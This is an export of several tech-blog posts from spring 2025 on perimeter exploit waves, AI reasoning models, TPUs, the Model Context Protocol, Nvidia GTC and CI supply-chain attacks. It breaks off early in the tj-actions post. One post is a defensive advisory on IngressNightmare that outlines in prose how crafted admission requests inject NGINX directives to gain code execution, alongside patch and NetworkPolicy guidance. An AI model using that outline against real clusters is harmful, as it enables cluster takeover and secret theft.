Security researchers and vendors discover the flaw, a patch is released, advisories go out — and then weeks pass before many organizations apply the fix. Attackers know this and increasingly automate exploitation to hit vulnerable devices in the gap.\nPart of the problem is operational: patching a firewall or VPN appliance often means a maintenance window, potential connectivity disruption, and testing to ensure nothing breaks. For organizations running 24/7 operations, that\u0026rsquo;s a significant coordination effort. But the alternative — leaving a known-exploited vulnerability unpatched — is far worse.\nAutomation helps here. If you\u0026rsquo;re not already using infrastructure-as-code practices for your network devices, this is a good motivation to start. Being able to rapidly rebuild a device configuration from code, test it in a staging environment, and deploy it with confidence makes emergency patching much less painful. This approach aligns with broader efforts around supply chain security standards like SLSA, which emphasize automation and reproducibility.\nMy Take # I\u0026rsquo;ve been doing this long enough to see the same patterns repeat. In the late 2000s, it was web application firewalls getting owned. In the 2010s, it was SSL VPN appliances. Now it\u0026rsquo;s the next generation of the same fundamental architecture — complex, internet-facing security appliances that become single points of failure when compromised.\nThe organizations that weather these storms best are the ones that don\u0026rsquo;t trust any single component completely. 
Defense in depth isn\u0026rsquo;t just a theoretical framework — it\u0026rsquo;s the practical difference between \u0026ldquo;we patched and moved on\u0026rdquo; and \u0026ldquo;we\u0026rsquo;re rebuilding our entire network because the firewall was a backdoor for three months.\u0026rdquo;\nIf this spring\u0026rsquo;s exploit wave motivates you to accelerate your zero-trust roadmap, then at least some good came from it. Start small — mutual TLS between services, identity-aware access controls, microsegmentation in your most critical environments. The perimeter isn\u0026rsquo;t going to protect you. Your architecture has to protect itself.\n","date":"24 April 2025","externalUrl":null,"permalink":"/posts/250424-spring-2025-exploit-wave-fortinet-ivanti/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"A surge of active exploitation targeting Fortinet and Ivanti edge devices highlights the persistent vulnerability of network perimeter infrastructure.","title":"The Spring 2025 Exploit Wave — Fortinet, Ivanti, and the Perimeter Problem","type":"posts"},{"content":"OpenAI just dropped two new models this week — o3 and o4-mini — and they represent a meaningful shift in how we think about AI-assisted development. These aren\u0026rsquo;t just incremental improvements over GPT-4o. They\u0026rsquo;re purpose-built reasoning models that think through problems step by step before generating answers, and the difference in output quality for complex tasks is immediately noticeable.\nI\u0026rsquo;ve spent the past few days putting both models through their paces on real engineering problems — debugging race conditions, analyzing system architectures, and working through infrastructure planning. Here\u0026rsquo;s what I\u0026rsquo;ve found.\nWhat \u0026ldquo;Reasoning Models\u0026rdquo; Actually Means # The o-series models differ from standard GPT models in a fundamental way: they use chain-of-thought reasoning at inference time. 
When you give o3 a complex problem, it doesn\u0026rsquo;t immediately start generating tokens. Instead, it works through the problem internally, considering multiple approaches, identifying potential issues, and structuring its reasoning before producing an answer.\nThis isn\u0026rsquo;t just prompt engineering magic — it\u0026rsquo;s an architectural difference. The model allocates additional compute to the reasoning phase, which means responses take longer to generate but are significantly more accurate for problems that require multi-step logic, mathematical reasoning, or careful analysis of edge cases.\no3 is the full-size model, positioned as OpenAI\u0026rsquo;s most capable reasoning system. o4-mini is the smaller, faster variant that trades some reasoning depth for significantly lower latency and cost. In my testing, o4-mini handles probably 80% of coding tasks just as well as o3, at a fraction of the cost. The gap shows up in truly complex scenarios — multi-file refactoring across a large codebase, or debugging subtle concurrency issues where the reasoning chain needs to be quite deep.\nTool Use and Agentic Capabilities # What sets o3 apart from earlier o-series models isn\u0026rsquo;t just better reasoning — it\u0026rsquo;s the integration with tool use. This mirrors the evolution of foundation models like Claude that are gaining expanded capabilities for reasoning and action. o3 can browse the web, execute code, analyze images, and chain multiple tool calls together in a single reasoning session. This is where things get interesting for developers.\nI tested o3 with a real-world scenario: given a Python application with a performance regression, could it identify the root cause? I gave it access to the codebase, profiling data, and the ability to run code. The model systematically profiled the hot paths, identified an N+1 query pattern introduced in a recent commit, and suggested a fix with the correct SQLAlchemy eager loading syntax. 
The entire chain of reasoning was visible and auditable.\nThis is qualitatively different from asking GPT-4o the same question. GPT-4o would give you a reasonable guess. o3 actually works through the problem methodically, and the tool use means it can verify its hypotheses before presenting conclusions.\nWhere It Falls Short # It\u0026rsquo;s not all perfect. The reasoning models have some real limitations that are worth understanding before you rebuild your workflows around them.\nFirst, latency. o3 can take 30-60 seconds to respond to complex queries. For interactive coding assistance — the kind of thing where you want instant suggestions as you type — that\u0026rsquo;s too slow. o4-mini is much faster (typically 5-15 seconds), but it\u0026rsquo;s still noticeably slower than GPT-4o\u0026rsquo;s sub-second responses for simple tasks.\nSecond, cost. o3 is expensive. The reasoning tokens count toward your usage, and for a complex problem, the model might generate thousands of reasoning tokens before producing a response. If you\u0026rsquo;re running this at scale — say, as part of a CI/CD pipeline for automated code review — the costs add up fast. You need to be strategic about when to use o3 versus o4-mini versus GPT-4o.\nThird, the reasoning isn\u0026rsquo;t always right. The chain-of-thought process can lead the model down incorrect reasoning paths, and because the reasoning feels more authoritative, there\u0026rsquo;s a risk of over-trusting the output. I caught o3 making a confident but incorrect assertion about Python\u0026rsquo;s GIL behavior in a threading analysis. 
The lesson: verify outputs, especially for anything that matters in production — a critical principle that regulatory frameworks like the EU AI Act are starting to mandate formally.\nPractical Integration Patterns # For my own workflow, I\u0026rsquo;ve settled on a tiered approach:\nGPT-4o for quick questions, documentation lookups, and simple code generation.\no4-mini for code review, bug analysis, and architectural discussions.\no3 for the hard problems — complex debugging sessions, security analysis, and system design reviews.\nThe API supports all three, so you can build tooling that routes requests to the appropriate model based on complexity. I\u0026rsquo;ve been experimenting with a simple heuristic: if the prompt contains more than 500 tokens of context and asks an analytical question, route to o4-mini. If it\u0026rsquo;s a multi-file analysis or explicitly complex, route to o3. Everything else goes to GPT-4o.\nMy Take # The o3/o4-mini release feels like a genuine step forward, not just marketing. The reasoning capabilities produce measurably better results on complex engineering tasks, and the tool use integration makes these models genuinely useful as development assistants rather than just fancy autocomplete.\nBut I want to temper the enthusiasm with a practical note: these models are tools, not replacements for engineering judgment. The most effective use I\u0026rsquo;ve found is as a rigorous thinking partner — something that forces you to articulate problems clearly and then stress-tests your assumptions. This approach to AI in development aligns with the AI platform strategies major tech companies are pursuing, treating AI as a collaborative tool rather than an autonomous agent. 
The model\u0026rsquo;s reasoning process often highlights edge cases I hadn\u0026rsquo;t considered, even when its proposed solution isn\u0026rsquo;t quite right.\nWe\u0026rsquo;re moving from \u0026ldquo;AI that generates code\u0026rdquo; to \u0026ldquo;AI that reasons about systems,\u0026rdquo; and that\u0026rsquo;s a significant evolution. The next few months will tell us whether this reasoning capability translates into meaningful productivity gains across the industry, or whether it\u0026rsquo;s primarily useful for a narrow set of complex analytical tasks.\nFor now, I\u0026rsquo;d recommend every developer spend a few hours experimenting with o3 and o4-mini on their hardest current problem. The results might surprise you.\n","date":"17 April 2025","externalUrl":null,"permalink":"/posts/250417-openai-o3-o4-mini-reasoning-models/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"OpenAI releases o3 and o4-mini reasoning models, bringing chain-of-thought inference to mainstream developer workflows.","title":"OpenAI's o3 and o4-mini — Reasoning Models Get Real","type":"posts"},{"content":"Google Cloud Next 2025 wrapped up yesterday in Las Vegas, and if you were paying attention, the message was unmistakable: the cloud wars have become AI infrastructure wars. The star of the show was Ironwood, Google\u0026rsquo;s 7th-generation TPU, and it represents a significant leap in what cloud providers are willing to build — and spend — to win the AI compute race.\nHaving attended Cloud Next events (virtually and in person) since the early days, I can say this one felt different. The entire conference was organized around a single thesis: AI workloads are the future of cloud computing, and everything else is secondary.\nIronwood: What Makes It Different # Google\u0026rsquo;s Ironwood TPU is purpose-built for large-scale AI inference and training. 
The numbers are impressive — Google claims a 4x improvement in performance-per-watt compared to TPU v5e, with significantly larger high-bandwidth memory pools that allow hosting bigger model shards per chip. This represents a major evolution in GPU and AI infrastructure strategy compared to competitors.\nWhat strikes me most is the architectural decision to optimize heavily for inference workloads alongside training. Previous TPU generations were primarily training-focused, with inference being handled by separate infrastructure. Ironwood unifies this, which makes economic sense when you consider that inference costs are rapidly becoming the dominant expense for organizations running production AI systems. Understanding AI infrastructure costs and inference optimization directly impacts deployment decisions.\nThe pod configurations scale up to 9,216 chips in a single cluster, connected via Google\u0026rsquo;s custom inter-chip interconnect (ICI). For context, that\u0026rsquo;s enough compute to run multiple copies of the largest foundation models simultaneously. Google is clearly building this for their own Gemini infrastructure first, but the fact that they\u0026rsquo;re making it available through Google Cloud is telling — they want enterprise customers locked into their AI compute stack.\nGemini 2.5 Pro and the Developer Story # The other major announcement was Gemini 2.5 Pro, which Google positions as their most capable model for coding and complex reasoning tasks. They demonstrated it handling multi-file code refactoring, long-context document analysis, and agentic workflows that chain multiple tool calls together.\nWhat caught my attention was the emphasis on the 1-million-token context window in production. 
We\u0026rsquo;ve heard about long context windows before, but Google showed real enterprise use cases — feeding entire codebases into the model for analysis, processing lengthy legal documents, and maintaining coherent conversations across massive amounts of reference material.\nFrom a developer tools perspective, Google also announced tighter integration between Gemini and their Cloud development suite. Firebase got AI-powered features, Cloud Run got streamlined model deployment, and BigQuery can now use Gemini for natural language data exploration. This mirrors the broader developer platform maturity seen across cloud infrastructure. The platform play is becoming very cohesive.\nThe Multi-Cloud Reality Check # Here\u0026rsquo;s what I think gets lost in the excitement of these announcements: most enterprises I\u0026rsquo;ve worked with over the past few years aren\u0026rsquo;t all-in on a single cloud. They\u0026rsquo;re running workloads across AWS, Azure, and GCP, often with some on-premises infrastructure still in the mix.\nGoogle\u0026rsquo;s strategy with Ironwood and the broader AI platform is clearly designed to change that calculus. If your AI inference runs best on TPUs, and your TPUs only exist in Google Cloud, you\u0026rsquo;ve got a strong incentive to centralize. It\u0026rsquo;s the same playbook AWS ran with custom Graviton instances — build hardware that only works in your cloud and make it compelling enough that migration becomes attractive.\nThe counter-argument is Kubernetes and the open ecosystem. Google themselves built Kubernetes to be cloud-agnostic, and tools like GKE Enterprise are designed to work across environments. But AI workloads don\u0026rsquo;t move easily between hardware architectures. A model optimized for TPU inference doesn\u0026rsquo;t just port to NVIDIA GPUs or AWS Trainium without significant engineering effort.\nWhat About the Competition? 
# AWS has been building their own AI chips — Trainium2 is in preview, and they\u0026rsquo;ve been aggressive with pricing. Microsoft and Azure have their NVIDIA partnership and custom Maia chips in development. But Google has a unique advantage: they\u0026rsquo;ve been building custom AI hardware longer than anyone. TPU v1 shipped internally in 2015. That\u0026rsquo;s a decade of silicon design iteration. Understanding the cost implications of these infrastructure choices is crucial for effective cloud cost engineering.\nThe question isn\u0026rsquo;t whether these chips are good — they are. The question is whether Google can translate hardware leadership into cloud market share. Historically, having the best technology hasn\u0026rsquo;t been enough in the cloud market. AWS won with breadth of services and developer mindshare. Azure won with enterprise relationships and Microsoft 365 integration.\nMy Take # What I find most compelling about Cloud Next 2025 isn\u0026rsquo;t any single announcement — it\u0026rsquo;s the coherence of the vision. Google is betting that AI infrastructure will be the deciding factor in the next phase of cloud competition, and they\u0026rsquo;re building every layer of the stack: custom silicon, optimized networking, integrated ML frameworks, and application-layer AI services. This mirrors the competitive hardware announcements from NVIDIA and echoes broader industry moves toward specialized compute.\nFor those of us building systems that need to scale, the practical takeaway is this: it\u0026rsquo;s worth evaluating TPU-based inference seriously, especially if you\u0026rsquo;re running large language models like Claude in production. The cost-performance improvements from Ironwood could meaningfully change your infrastructure economics.\nBut don\u0026rsquo;t lock yourself in without an exit strategy. The cloud landscape shifts fast, and today\u0026rsquo;s best option might not be tomorrow\u0026rsquo;s. 
Architect for portability where you can, optimize for performance where you must.\nThe AI infrastructure war is just getting started, and as engineers, we\u0026rsquo;re the ones who get to decide where the workloads actually run.\n","date":"10 April 2025","externalUrl":null,"permalink":"/posts/250410-google-cloud-next-2025-ironwood-tpu/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Google unveils its 7th-gen Ironwood TPU at Cloud Next 2025, signaling a new phase in the cloud AI infrastructure war.","title":"Google Cloud Next 2025 — Ironwood TPU and the Infrastructure Arms Race","type":"posts"},{"content":"While the tech press has been focused on model sizes and benchmark scores, something potentially more important has been quietly gaining momentum: Anthropic\u0026rsquo;s Model Context Protocol (MCP). Announced late last year as an open standard, MCP is starting to see real adoption — and it could fundamentally change how we build AI-powered applications.\nWhat MCP Actually Is # At its core, the Model Context Protocol defines a standardised way for AI models to interact with external tools and data sources. Think of it as a universal adapter layer between an LLM and the world outside its training data.\nBefore MCP, every AI integration was bespoke. Want your AI assistant to query a database? Write a custom function. Want it to search your codebase? Build another integration. Want it to interact with your project management tool? Yet another custom adapter. Each AI platform had its own approach: OpenAI has function calling, Anthropic has tool use, Google has function declarations — all similar in concept but different in implementation.\nMCP proposes a different model: define your tools and data sources once, using a standard protocol, and any MCP-compatible AI client can use them. 
It\u0026rsquo;s the same pattern we\u0026rsquo;ve seen succeed in other domains — LSP (Language Server Protocol) standardised how editors talk to language tooling, and it transformed the developer tools landscape. MCP aims to do the same for AI integrations.\nThe Architecture # MCP follows a client-server architecture. MCP servers expose capabilities — tools, resources (data), and prompts — through a standardised JSON-RPC interface. MCP clients (typically AI applications or agents) connect to these servers and can discover and invoke their capabilities.\nThe protocol supports multiple transport mechanisms, including stdio (for local integrations) and HTTP with Server-Sent Events (for remote services). A typical setup might look like:\nAI Application (MCP Client)\n├── MCP Server: File System Access\n├── MCP Server: Database Queries\n├── MCP Server: Git Operations\n└── MCP Server: API Integration\nEach server is a relatively simple program that exposes its capabilities in a structured format. The AI model receives descriptions of available tools and can decide when and how to use them based on the user\u0026rsquo;s request. This is where it differs from traditional API integration — the AI has agency in choosing which tools to invoke and how to compose them.\nThe SDKs are available in TypeScript and Python, making it straightforward to build both servers and clients. I\u0026rsquo;ve been experimenting with building a few MCP servers, and the developer experience is genuinely good — you can have a working server exposing custom tools in under an hour. This is especially powerful because modern foundation models like Claude can dynamically discover and reason about available tools.\nWhy Adoption Is Picking Up # Several factors are driving MCP adoption right now. 
First, Anthropic open-sourced the specification and reference implementations under a permissive license, removing the \u0026ldquo;vendor lock-in\u0026rdquo; concern that often kills open standards from single companies.\nSecond, developer tool makers are starting to integrate MCP natively. Cursor, the AI-powered code editor, added MCP support, which means you can extend its AI capabilities with custom tools without waiting for the Cursor team to build specific integrations. Other development tools are following suit.\nThird, the community has been prolific. There are already MCP servers for databases (PostgreSQL, SQLite), cloud platforms (AWS), version control (Git, GitHub), file systems, and dozens of other tools. The ecosystem is growing in that organic, bottom-up way that characterises successful open standards.\nImplications for Developers # If MCP succeeds as a standard, it changes the calculus for AI integration in several ways.\nBuild once, use everywhere. Instead of building separate integrations for each AI platform, you build an MCP server for your tool or service, and it works with any MCP-compatible client. This is especially valuable for internal tools — instead of building a ChatGPT plugin AND a Claude integration AND a custom solution, you build one MCP server.\nComposability. Because MCP servers are independent processes, you can mix and match them. Need an AI agent that can search your codebase, query your monitoring system, and create Jira tickets? Connect three MCP servers and the AI can orchestrate across all of them. This composability is powerful for building complex workflows without monolithic integration code.\nSecurity boundaries. Each MCP server runs in its own process with its own permissions. This is architecturally cleaner than giving an AI model direct access to everything — you can control what each server exposes and audit its usage independently. 
The protocol includes capability negotiation, so clients and servers can agree on what operations are permitted.\nLocal-first development. The stdio transport means MCP servers can run entirely on your local machine with no cloud dependency. This is important for sensitive codebases and development environments where sending data to external services isn\u0026rsquo;t acceptable.\nChallenges and Open Questions # MCP isn\u0026rsquo;t without challenges. The security model, while better than \u0026ldquo;give the AI your API key,\u0026rdquo; still needs maturation. When an AI agent can dynamically discover and invoke tools, the attack surface is broad. Malicious MCP servers, prompt injection through tool outputs, and privilege escalation through tool composition are all concerns that the community is actively working on.\nThere\u0026rsquo;s also the adoption chicken-and-egg problem. MCP is most valuable when there\u0026rsquo;s a rich ecosystem of servers and clients, but developers won\u0026rsquo;t build servers until there are enough clients, and vice versa. Anthropic\u0026rsquo;s integration in Claude Desktop and the Cursor adoption help bootstrap this, but it needs more momentum. As governance frameworks like the EU AI Act start requiring visibility into AI agent actions, standardized protocols like MCP for tool invocation will become increasingly important.\nPerformance is another consideration. Each tool invocation adds latency — the AI decides to use a tool, sends a request to the MCP server, waits for a response, and then incorporates the result. For interactive applications, this round-trip overhead can affect the user experience. Server implementations need to be fast, and clients need to handle async tool calls gracefully.\nMy Take # I\u0026rsquo;ve seen enough technology cycles to be cautious about \u0026ldquo;universal standards\u0026rdquo; — for every LSP success story, there are a dozen standards that never achieved critical mass. 
But MCP has several things going for it: a clear problem statement, a well-designed protocol, good reference implementations, and backing from a major AI company that\u0026rsquo;s committed to keeping it open.\nWhat excites me most is the potential to make AI integration a first-class part of the developer experience rather than an afterthought. Right now, connecting AI to your specific tools and data is still too much friction. If MCP can reduce that friction to \u0026ldquo;install an MCP server and it just works,\u0026rdquo; it\u0026rsquo;ll unlock a lot of practical AI applications that are currently too expensive to build.\nWhether Anthropic\u0026rsquo;s protocol becomes the standard or merely inspires a better one, the direction is right. We need standardised ways for AI models to interact with the world, and MCP is the most credible attempt I\u0026rsquo;ve seen so far.\nPart of my Developer Landscape series, exploring the tools and trends shaping how we build software.\n","date":"3 April 2025","externalUrl":null,"permalink":"/posts/250403-model-context-protocol-adoption/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Anthropic’s Model Context Protocol is gaining traction as a universal standard for connecting AI models to tools and data sources, and the implications for the developer ecosystem are worth watching.","title":"Model Context Protocol — The Quiet Standard That Could Reshape AI Tooling","type":"posts"},{"content":"If you\u0026rsquo;re running Kubernetes with the ingress-nginx controller — and statistically, there\u0026rsquo;s a good chance you are — stop reading this and patch first. The set of vulnerabilities collectively dubbed \u0026ldquo;IngressNightmare\u0026rdquo; by the researchers at Wiz is as bad as it sounds: unauthenticated remote code execution that can lead to full cluster takeover. This follows the pattern of zero-day patch cycles and highlights why supply chain security matters for infrastructure. 
This is a CVSS 9.8, and it deserves your immediate attention.\nThe Vulnerability Chain # IngressNightmare isn\u0026rsquo;t a single vulnerability but a chain of issues (CVE-2025-1974, CVE-2025-1097, CVE-2025-1098, CVE-2025-24514) that, when combined, allow an attacker with network access to the admission controller to achieve remote code execution without any authentication.\nThe core problem lies in the ingress-nginx admission controller, which validates Ingress objects before they\u0026rsquo;re applied to the cluster. The controller takes Ingress configuration and passes it through NGINX configuration generation, but certain annotations can be crafted to inject arbitrary NGINX directives. The admission controller runs with elevated privileges — it needs to read secrets across the cluster to configure TLS — which means code execution in this context gives you access to every TLS certificate and secret in the cluster.\nThe attack flow works roughly like this:\nAn attacker sends a specially crafted AdmissionReview request to the admission controller webhook.\nThe malicious Ingress annotations inject directives into the NGINX configuration template.\nWhen NGINX validates the generated configuration, the injected directives execute arbitrary code.\nThe attacker gains a shell with the permissions of the ingress-nginx service account.\nThe particularly nasty aspect is that the admission controller webhook is often exposed on the pod network, meaning any pod in the cluster — or anything that can reach the cluster network — can trigger it. In many cloud environments, the admission webhook endpoint is reachable from within the VPC without additional authentication. Understanding platform maturity and infrastructure hardening is essential for defending against such attack surfaces.\nWhy This Is Worse Than a Typical CVE # Several factors make IngressNightmare especially concerning. 
First, the prevalence: ingress-nginx is the most popular ingress controller for Kubernetes, used in roughly 40% of clusters according to Wiz\u0026rsquo;s analysis. That\u0026rsquo;s an enormous attack surface.\nSecond, the privilege level: the ingress-nginx controller typically has access to all Secrets in the cluster because it needs to configure TLS. Compromising it doesn\u0026rsquo;t just give you a foothold — it gives you the keys to the kingdom. TLS private keys, API tokens, database credentials — anything stored as a Kubernetes Secret is potentially exposed.\nThird, the stealth factor: the exploit works through the admission webhook, which is a legitimate Kubernetes API endpoint. It doesn\u0026rsquo;t require creating any persistent resources in the cluster, making it harder to detect through standard audit logging that focuses on resource creation and modification.\nThe Patch and Mitigation # The ingress-nginx team has released patched versions that address all four CVEs. If you\u0026rsquo;re running ingress-nginx, update to version 1.12.1 or 1.11.5 immediately. Check your installed version:\nkubectl get deployment -n ingress-nginx ingress-nginx-controller \\ -o jsonpath=\u0026#39;{.spec.template.spec.containers[0].image}\u0026#39; If you can\u0026rsquo;t patch immediately, there are mitigations:\nRestrict network access to the admission webhook. The admission controller webhook shouldn\u0026rsquo;t need to be accessible from arbitrary pods. Use NetworkPolicies so that only the Kubernetes API server can reach it. In the policy below, the ipBlock CIDR is a placeholder for your own API server address, and the second rule keeps ports 80 and 443 open for regular traffic:\napiVersion: networking.k8s.io/v1 kind: NetworkPolicy metadata: name: restrict-admission-webhook namespace: ingress-nginx spec: podSelector: matchLabels: app.kubernetes.io/name: ingress-nginx policyTypes: - Ingress ingress: - from: - ipBlock: cidr: 192.0.2.10/32 ports: - port: 8443 protocol: TCP - ports: - port: 80 protocol: TCP - port: 443 protocol: TCP Disable the admission controller if you\u0026rsquo;re not actively using it for validation. Remove the ValidatingWebhookConfiguration for ingress-nginx.
You lose admission validation, but you eliminate the attack vector.\nAudit your annotation usage. The specific annotations exploited include auth-url, auth-tls-match-cn, and custom configuration snippets. If you\u0026rsquo;re not using these, restrict them via admission policies.\nThe Bigger Picture: Kubernetes Security Complexity # IngressNightmare is a symptom of a broader challenge with Kubernetes security. The platform is extraordinarily flexible, but that flexibility creates a large and complex attack surface. Every controller, operator, and webhook is a potential entry point, and the permissions model — while powerful — makes it easy to grant excessive privileges without realising the implications. Securing these systems requires the kind of hardening practices documented in dedicated guides.\nI\u0026rsquo;ve been working with Kubernetes since the early days, and the security posture of most clusters I encounter still worries me. Common issues include: overly permissive RBAC roles, no network policies (the default is allow-all), secrets stored unencrypted in etcd, and admission controllers running with cluster-admin equivalent permissions. These vulnerabilities mirror the attack vectors we see in CI/CD supply chain compromises, where misconfigured infrastructure permissions become the critical weakness.\nThe ingress controller is particularly critical because it\u0026rsquo;s the front door — it\u0026rsquo;s the component that terminates external traffic and routes it into the cluster. Compromising the front door bypasses all the internal security controls you\u0026rsquo;ve carefully configured.\nMy Take # Every time a vulnerability like IngressNightmare drops, I hear the same refrain: \u0026ldquo;Kubernetes is too complex.\u0026rdquo; And there\u0026rsquo;s truth to that — the operational burden of running Kubernetes securely is substantial. 
But the answer isn\u0026rsquo;t to abandon Kubernetes; it\u0026rsquo;s to invest in understanding and hardening it properly.\nWhat concerns me most about this vulnerability is how many teams are running ingress-nginx in production without understanding the implications of the admission controller\u0026rsquo;s privilege model. The controller needs broad secret access by design, which means it must be treated as a tier-zero security component — on par with your identity provider and certificate authority.\nIf this incident motivates you to do one thing, make it this: review the RBAC permissions and network exposure of every admission webhook in your cluster. They\u0026rsquo;re some of the most privileged components in your infrastructure, and they deserve corresponding security attention. Following supply chain security standards for infrastructure components means treating permission boundaries as seriously as you treat data protection.\nPatch today. Audit tomorrow. Don\u0026rsquo;t let this one slip through the backlog.\nPart of my Security in Practice series, examining real-world security incidents and what they mean for development and operations teams.\n","date":"27 March 2025","externalUrl":null,"permalink":"/posts/250327-ingress-nightmare-kubernetes-vulnerability/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"CVE-2025-1974 and related vulnerabilities in the Kubernetes ingress-nginx controller allow unauthenticated remote code execution, affecting an estimated 40% of Kubernetes clusters.","title":"IngressNightmare — Critical Kubernetes NGINX Vulnerability Puts Clusters at Risk","type":"posts"},{"content":"Jensen Huang took the stage at GTC this week in San Jose, and as usual, the keynote was a masterclass in product roadmap theatre. But behind the leather jacket and the carefully choreographed reveals, there\u0026rsquo;s a genuinely important story about where computing infrastructure is heading. 
Nvidia isn\u0026rsquo;t just selling GPUs anymore — they\u0026rsquo;re defining the architecture of AI-era data centres.\nBlackwell Ultra and the Compute Trajectory # The headline announcement is the Blackwell Ultra GPU, which succeeds the Blackwell architecture that started shipping to cloud providers late last year. The numbers are impressive on paper: significantly higher memory bandwidth, larger HBM3e capacity, and improved interconnect speeds for multi-GPU configurations.\nBut the number that matters most for practitioners is the inference throughput improvement. Nvidia is claiming substantial gains in tokens-per-second for large language model inference, which directly translates to lower cost per query for anyone running AI services at scale. If you\u0026rsquo;re deploying models in production, the economics of each hardware generation determine what\u0026rsquo;s viable.\nWhat\u0026rsquo;s more interesting to me are the NVLink interconnect improvements. The bottleneck for large model training and inference isn\u0026rsquo;t just raw compute — it\u0026rsquo;s how fast you can move data between GPUs. Blackwell Ultra\u0026rsquo;s NVLink improvements mean you can scale to larger clusters without the interconnect becoming the limiting factor as quickly. For training runs that span thousands of GPUs, this is where the real gains come from.\nVera Rubin: Looking Two Steps Ahead # In typical Nvidia fashion, Jensen didn\u0026rsquo;t just announce the current generation — he previewed the next next generation: the Vera Rubin architecture, expected in 2026. Named after the astronomer who provided evidence for dark matter, the Rubin GPU paired with the Vera CPU represents Nvidia\u0026rsquo;s move toward tighter CPU-GPU integration.\nThis matters because the trend in AI workloads is moving toward more heterogeneous compute.
Not everything in an AI pipeline benefits from GPU acceleration — data preprocessing, tokenization, and orchestration logic often run more efficiently on CPUs. Having a tightly integrated CPU-GPU system with high-bandwidth shared memory could simplify the software stack significantly.\nFor those of us building inference pipelines for advanced AI models today, the implication is clear: the hardware is going to keep getting faster and more efficient, which means the software architecture decisions we make should optimise for flexibility rather than squeezing every last bit of performance from current hardware. What\u0026rsquo;s GPU-memory-bound today might not be in eighteen months.\nDGX Cloud and the Democratisation Question # The other significant announcement is the expansion of DGX Cloud, Nvidia\u0026rsquo;s cloud-hosted AI supercomputing service. Partnerships with major cloud providers mean that teams without the capital (or power infrastructure) to buy racks of Blackwell GPUs can still access them on demand.\nThis is important for the broader developer ecosystem. The cost barrier to training or fine-tuning large models has been a significant filter on who gets to participate in AI development. Cloud access to cutting-edge hardware doesn\u0026rsquo;t eliminate the cost entirely — it\u0026rsquo;s still expensive — but it changes the economics from \u0026ldquo;multi-million dollar capital expenditure\u0026rdquo; to \u0026ldquo;operational expense you can scale up and down.\u0026rdquo;\nI\u0026rsquo;ve been watching this dynamic play out in several projects where teams start with cloud GPU instances for experimentation, then evaluate whether on-premises hardware makes sense for production workloads with predictable demand patterns. The break-even calculation varies enormously based on utilisation rates. 
This same buy-versus-rent decision applies to competing platforms like Google\u0026rsquo;s custom TPUs, and Nvidia\u0026rsquo;s rapid hardware cadence makes the calculation even more complex — do you buy Blackwell today knowing Rubin is eighteen months away?\nThe Software Stack Is the Moat # What often gets overlooked in the GTC hardware spectacle is that Nvidia\u0026rsquo;s real competitive advantage is the software ecosystem. CUDA has been the dominant GPU programming framework for over a decade, and the ecosystem of libraries built on top of it — cuDNN, TensorRT, NCCL, Triton Inference Server — creates enormous switching costs.\nGTC 2025 continued this strategy with announcements around NIM (Nvidia Inference Microservices) and expanded framework support. The NIM containers package optimised models with the right runtime configurations, making it significantly easier to deploy models in production without deep GPU programming expertise.\nFor developers, this is a double-edged sword. The abstraction layers make it easier to get started and achieve good performance, but they also deepen the dependency on Nvidia\u0026rsquo;s stack. AMD\u0026rsquo;s ROCm and Intel\u0026rsquo;s oneAPI are making progress, but the gap in the software ecosystem remains the real barrier to GPU competition — not the hardware specs.\nThe Energy Elephant in the Room # One topic that received less attention than it deserves is power consumption. These new GPU systems draw enormous amounts of electricity, and the cooling requirements are pushing data centres toward liquid cooling solutions. Nvidia showcased some of this infrastructure, but the fundamental question remains: as AI compute demand grows exponentially, where does the power come from?\nFor developers and infrastructure teams, this has practical implications. Cloud providers are already seeing capacity constraints in certain regions, and pricing reflects the power costs. 
If you\u0026rsquo;re planning AI infrastructure deployments, energy availability and cost should be in your architecture decisions alongside the usual performance and latency considerations.\nMy Take # I\u0026rsquo;ve attended GTC presentations (remotely, at least) for years now, and the trajectory is remarkable. Nvidia has executed a strategy of controlling the full stack — hardware, interconnects, system software, and increasingly the application frameworks — that gives them a position in AI infrastructure similar to what Intel had in enterprise computing in the 2000s.\nFor most developers, the practical takeaway from GTC 2025 is that AI inference is going to get cheaper and faster, which expands the range of applications where it makes economic sense. If you\u0026rsquo;ve been holding off on integrating AI capabilities into your products because of cost concerns, revisit those calculations. The cost curve is dropping faster than most people expected.\nThe competitive landscape for AI hardware will evolve — AMD, Intel, and custom silicon from the hyperscalers will eventually provide real alternatives. Similar competition exists at the software systems level where languages and kernels enable different performance characteristics. But for the next couple of years at least, Nvidia\u0026rsquo;s ecosystem dominance means their roadmap is effectively the industry\u0026rsquo;s roadmap. 
Plan accordingly.\nPart of my Infrastructure Notes series, examining the systems and platforms that underpin modern software development.\n","date":"20 March 2025","externalUrl":null,"permalink":"/posts/250320-nvidia-gtc-2025-blackwell-ultra/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Nvidia’s GTC 2025 keynote unveiled Blackwell Ultra and the next-gen Vera Rubin architecture, doubling down on the infrastructure layer that powers everything in AI.","title":"Nvidia GTC 2025 — Blackwell Ultra and the Infrastructure Race for AI","type":"posts"},{"content":"If you\u0026rsquo;re running GitHub Actions in your CI/CD pipeline — and let\u0026rsquo;s be honest, most of us are at this point — you need to pay attention to what happened this week. The popular tj-actions/changed-files action was compromised, and attackers used it to exfiltrate secrets from CI runners across thousands of repositories. This is the kind of supply chain attack that keeps me up at night.\nWhat Happened # The tj-actions/changed-files action is widely used — it helps workflows determine which files changed in a pull request or push, so you can conditionally run tests, lints, or deployments. It has millions of downloads and is referenced in countless workflow files.\nAttackers managed to compromise the action by modifying the tagged releases. When a workflow references an action by tag (e.g., tj-actions/changed-files@v45), GitHub resolves that to a specific commit. The attackers altered what the tags pointed to, inserting malicious code that dumped CI runner environment variables — including secrets — to workflow logs.\nThe attack was initially spotted by researchers at StepSecurity, who detected unusual behaviour in their monitoring systems. 
